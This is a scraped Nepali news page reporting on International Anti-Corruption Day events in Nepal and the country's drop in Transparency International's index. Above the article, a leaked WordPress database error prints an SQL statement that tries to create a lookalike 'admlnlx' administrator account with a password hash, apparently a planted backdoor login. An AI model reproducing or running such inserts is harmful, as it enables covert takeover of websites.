WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BVDTq7enFH6MgmcHl7u1lEg6kyhbav/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-07 14:19:18', '', 'admlnlx', 'admlnlx')
काठमाडौं,मंसिर २४-
भ्रष्टाचार विरुद्धको अन्तर्राष्ट्रिय दिवस विकास, शान्ति र सुरक्षाका लागि भ्रष्टाचार विरुद्ध एकजुट होऔुं भन्ने नाराका साथ शुक्रबार नेपालमा पनि विभिन्न कार्यक्रम गरी मनाईंदैछ। दिवसका अवसरमा अख्तियार दुरुपयोग अनुसन्धान आयोगको संयोजनमा भ्रष्टाचारविरुद्धको क्षेत्रमा काम गर्दै आएका विभिन्न गैरसरकारी संघसंस्थाको सहभागितामा र्याली सहितको कार्यक्रम हुँदैछ।
संयुक्त राष्ट्रसंघले सन् २००३ मा भ्रष्टाचारविरुद्धको अन्तर्राष्ट्रिय महासन्धि पारित गरेपछि विश्वभर डिसेम्बर ९ तारिखमा दिवस मनाउने गरिएको छ। नेपालले सन् २०११ मा महासन्धिलाई अनुमोदन गरेको थियो। दिवसका अवसरमा सन्देश दिँदै संयुक्त राष्ट्रसंघका महासचिव वान की मूनले भ्रष्टाचारले व्यक्ति, समुदाय र देशलाई खोक्रो बनाउने, शिक्षा र स्वास्थ्यको अवस्थालाई कमजोर बनाउने, निर्वाचन प्रक्रियालाई बेवास्ता गर्ने, अन्यायलाई बल पुर्याउने, आर्थिक तथा सामाजिक विकासमा असर गरी गरिबी बढाउने हुँदा यसको अन्त्य गर्ने प्रतिबद्धता दोहोर्याउन आग्रह गरेका छन्।
नेपालमा गएको वर्ष भ्रष्टाचार बढेको देखिएको छ। ट्रान्सपरेन्सी इन्टरनेशनलले निकालेको सूचकांकमा नेपाल १ सय २६ बाट १ सय ३० औँ स्थानमा झरेको छ।